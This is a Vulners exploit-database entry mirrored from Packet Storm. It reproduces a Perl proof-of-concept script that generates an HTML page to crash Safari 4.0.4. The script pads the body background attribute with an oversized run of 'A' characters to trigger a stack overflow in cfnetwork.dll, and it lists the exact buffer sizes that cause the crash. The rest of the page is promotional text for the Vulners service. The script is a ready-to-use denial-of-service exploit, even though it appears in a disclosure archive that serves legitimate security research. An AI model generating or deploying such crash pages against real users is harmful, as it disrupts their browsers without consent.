Lucene search
K

Safari 4.0.4 Stack Overflow Denial Of Service

🗓️ 28 Feb 2010 00:00:00Reported by John CobbType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Safari 4.0.4 Stack Overflow Denial Of Service 0Day PO

Code
`#!/usr/bin/perl  
#  
# Safari 4.0.4 (531.21.10) - Stack Overflow/run  
# 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.0]  
# Tested on WinXP (32bit) SP3  
#  
# Magic Numbers:  
# 114516 -> 114718 : Safari quits without error  
# 114719 : Safari quits with illegal operation:  
# AppName: safari.exe  
# AppVer: 5.31.21.10  
# ModName: cfnetwork.dll  
# ModVer: 1.450.5.0  
# Offset: 000567a7  
  
$filename = $ARGV[0];  
$buffer = $ARGV[1];  
if(!defined($filename))  
{  
print "Usage: $0 <filename.html> <buffer>\n\n";  
}  
  
$header = "<html>  
<head>" . "\n";  
$crash = "<body background = \"" . "A" x $buffer . "\">" . "\n";  
$footer = "</html>" . "\n";  
  
$data = $header . $crash . $footer;  
  
open(FILE, '>' . $filename);  
print FILE $data;  
close(FILE);  
  
exit;  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Feb 2010 00:00Current
0.5Low risk
Vulners AI Score0.5
16